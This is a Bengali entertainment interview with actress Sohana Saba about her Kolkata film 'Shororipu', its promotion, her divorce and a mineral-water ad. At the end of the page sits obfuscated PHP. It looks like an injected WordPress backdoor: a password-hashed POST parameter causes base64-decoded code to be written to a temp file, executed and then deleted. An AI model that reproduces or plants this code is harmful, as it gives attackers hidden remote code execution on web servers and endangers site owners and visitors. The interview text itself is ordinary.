সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

আমি ভাল আছি আর ভাল থাকতে চাই

Sohana_Saba_1বাংলাদেশের জনপ্রিয় টিভি ও চলচ্চিত্র অভিনয়শিল্পী সোহানা সাবা। দেশের গণ্ডি পেরিয়ে পা রেখেছেন টালিগঞ্জের ইন্ড্রাস্ট্রিতে। কাজের মধ্য দিয়েই তুলে ধরছেন জন্মভূমি বাংলাদেশকে। আর অভিনয় করেছেন ’ষড়রিপু’ সিনেমাতে। ছবিতে রাকা চরিত্রে দেখা মিলবে তার। আসছে ৩ জুন সোহানা সাবা অভিনীত এ ছবিটি কলকাতায় মুক্তি পাবে। ছবিটি পরিচালনা করেছেন অয়ন চক্রবর্তী। এ ছবিতে ইন্দ্রনীল সেনগুপ্ত, রজতাভ দত্ত, চিরঞ্জিৎ, রুদ্রনীলসহ আরও অনেকেই অভিনয় করেছেন। চিত্রগ্রহণে ছিলেন শীর্ষ রায়। আর বর্তমানে ছবিটির প্রচারের কাজে ভীষণ ব্যস্ত সময় কাটছে সাবার।

আমাদের দেশের বেশিরভাগ অভিনেতা কিংবা অভিনেত্রীর ক্ষেত্রে বিষয়টা এমনই ঘটেছে তারা যে কোন প্রযোজনা প্রতিষ্ঠানের ব্যানারের সাথে যুক্ত হয়ে কলকাতার ছবিতে অভিনয় করেছেন, সেদিক থেকে আপনি কোন দিক থেকে ভিন্ন?

সোহানা সাবা: আমার কাছে বিষয়টি অনেকটা এরকমই যে আমার ডেস্ট্রিনেশনটা কি, আমি কোথায় যেতে চাই, কি ধরনের কাজ করতে চাই এবং আমার ইচ্ছা শক্তিটা এক্ষেত্রে কতটা প্রবল। আমি আমার দেশে যে ধরনের চলচ্চিত্রগুলোতে প্রধান প্রধান চরিত্রে অভিনয় করেছি, দেশের বাইরেও তাই। আমি যেমনটা চেয়েছিলাম কলকাতার ছবিতে কাজ করতে গিয়ে তেমনটিই পেয়েছি।

Sohana_Saba_2আচ্ছা, ‘ষড়রিপু’র সঙ্গে যুক্ত হলেন কি করে?

সোহানা সাবা: ভারতের একটি উৎসবে আমার সিনেমা ‘বৃহন্নলা’য় আমার অভিনয় দেখে কলকাতার পরিচালক অনিকেত আমাকে এ ছবিতে অভিনয় করার জন্যে প্রস্তাব দেন। আমার সাথে নির্মাতা অয়ন চক্রবর্তীর কথা হয় ২০১৪ সালের ডিসেম্বরের দিকে। এরপরেই তো ২০১৫ সালের মার্চে সংবাদ সম্মেলনের মাধ্যমে সবাইকে জানানো হয়েছিলো। আমাকে যখন প্রস্তাব দেওয়া হয় তখন আমি চিন্তা করলাম, হ্যাঁ সিনেমাটিতে কাজ করা যায়। তাঁর বন্ধু অয়নের কাছে আমার নামটি বলেন। অয়ন আমার অসংখ্য কাজ দেখেন। তারপর আমাকেই উপযুক্ত মনে করেছেন। তার ছবিতে অভিনয়ের সুযোগ দিয়েছেন।

ছবিটির ট্রেলার দেখে বোঝা গেল, এ ছবিতে আপনাকে একটু ভিন্নভাবে উপস্থাপন করা হয়েছে?

সোহানা সাবা: আমি বিশ্বাস করি মানুষ যা চায়, তার সাথে সেরকমটাই ঘটে। বাংলাদেশে যে মানের সিনেমা ও চরিত্রে অভিনয় করেছি সেরকম কিছুই করতে চাচ্ছিলাম। চমৎকার টিম, চমৎকার গল্প, চমৎকার চরিত্র দারুণ উপস্থাপন ভঙ্গি। একজন অভিনয়শিল্পীর সবসময় চেষ্টা থাকে নিজেকে নতুন করে প্রকাশের। আমি অন্তত সেই চেষ্টাটাই করি। ‘ষড়রিপু’র রাকা চরিত্রটি তার ধারাবাহিকতাই বলতে পারেন।

Sohana_Saba_4‘ষড়রিপু’তে তো আপনাকে বেশ আবেদনময়ী হিসেবেও তুলে ধরা হয়েছে?

সোহানা সাবা: শুধু এইটুকু কথাই বলতে চাই। আবেদনময়ী কথাটা চরিত্রটাকে ব্র্যাকেটে ফেলে দেয়। তবে আমার চরিত্রের গুরুত্ব হলো আমি সুন্দরী। আমি সুন্দর না হওয়া স্বত্বেও আমার পরিচালক আমাকে যারপরনাই চেষ্টা করেছেন সুন্দর দেখাতে। এ ব্যপারে আমি তার কাছে কৃতজ্ঞ। ‘ষড়রিপু’ সোহানার জন্য মাইলস্টোন ।

ছবি মুক্তি পাবে ৩ জুন, প্রচারণার কাজে কলকাতায় যাবেন না?

সোহানা সাবা: আমি কিন্তু সম্প্রতি একবার কলকাতায় এ ছবির প্রচারণার কাজে গিয়েছিলাম। গত ১৩ মে ছবির মিউজিক রিলিজে উপস্থিত ছিলাম। বিলবোর্ডের জন্য ফটোশুট করেছি। ১ জুন আবার কলকাতা যাবো। আমি চাই ছবিটির খবর সবার দাঁড়প্রান্তে পৌঁছাক।

ছবির শুটিং করতে গিয়ে দারুণ কিংবা শিউরে উঠার মতো কোন অভিজ্ঞতা আছে?

সোহানা সাবা: এই সিনেমার একটি দৃশ্যে অভিনয় করতে গিয়ে আমি কতবার যে ভয়ে শিউরে উঠেছি তা বলা দায়। সারাদিন শরীরে রক্ত মেখে শুয়ে ছিলাম। শরীরে রক্ত, বাথটাবে রক্ত, দেওয়ালে, মেঝেতে ছড়িয়ে আছে রক্ত। একবার উঠে সামান্য ফ্রেশ হয়ে দুপুরে খেলাম, আবার এসে রক্ত নিয়ে শুয়ে আছি। এই দৃশ্যটা সম্পন্ন করতে সারাটা দিন লেগে গিয়েছিলো। এমনিতেই আমি এসব এড়িয়ে চলি, কিন্তু আমি এসব ভয় পাই না।

Sohana_Saba_5এবার ভিন্ন প্রসঙ্গ, নতুন কোনো সিনেমায় অভিনয় করছেন?

সোহানা সাবা: দেখুন আমি সবকিছু আগেই বলতে চাই না। ‘ষড়রিপু’তে কাজ করার ৫দিন আগে সবাইকে জানিয়েছি। আগে তো চূড়ান্ত হোক। শুটিংয়ের আগে সবাইকে জানাব।

আপনার ব্যক্তিজীবন প্রসঙ্গ, মুরাদ পারভেজের সঙ্গে ছাড়াছাড়িটা শেষ পর্যন্ত হয়েই গেল!

সোহানা সাবা: ব্যক্তিগত জীবন নিয়ে আলোচনা করতে চাইনা। শুধু বলবো মাত্র আমার ডিভোর্স সম্পন্ন হলো। ৮মাস ধরে আলাদাভাবে ছিলাম আমরা। এই ৮মাসের পূর্বে যথেস্ট কারণ ছিল একসাথে থাকার। আবার যথেষ্ট কারণও আছে শত চেষ্টা করেও একসাথে না থাকতে পারার। ব্যক্তিগত জীবনে আমি কী করছি, কোথায় যাচ্ছি—এগুলো জানাতে পছন্দ করি না।

তাহলে সেদিক থেকে ব্যক্তিজীবন নিয়ে নতুন করে কিছু কি ভাবছেন?

সোহানা সাবা: না, সেরকম কোন পরিকল্পনা নেই। তবে জীবনটা সুন্দর মনে হয়। আমি ভাল আছি আর ভাল থাকতে চাই। আমার ভালো থাকার জন্যে আমার পরিবার, বন্ধু, সবই দরকার। ভালো থাকতে জীবনে যদি অন্য কাউকে পাশে দরকার হয়, আমার তাতেও আপত্তি নেই।

Sohana_Saba_3তাহলে বিষয়টি আরেকটু বিস্তারিতভাবে বলবেন কি?

সোহানা সাবা: হা হা হা! সবই তো বলে দিলাম। যদি পেয়ে যাই অবশ্যই জানাব।

আপনি তো কলকাতায় সম্প্রতি নতুন একটি বিজ্ঞাপনে কাজ করেছেন?

সোহানা সাবা: জমজম মিনারেল ওয়াটার নামে একটি পণ্যের বিজ্ঞাপন মডেল হয়েছি। এর শুটিং হয়েছে দার্জিলিং -এ। নির্মাতা কলকাতার চলচ্চিত্র পরিচালক রুপক মজুমদার। অনেক বছর পর বিজ্ঞাপন করলাম। অনেক প্রস্তাব পাওয়া স্বত্ত্বেও মাঝে করিনি।আমাকে এখানে একদম অন্যভাবে দেখা যাবে। নিজেকে দেখে নিজেরই দারুণ লাগছিল কাজের সময়।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}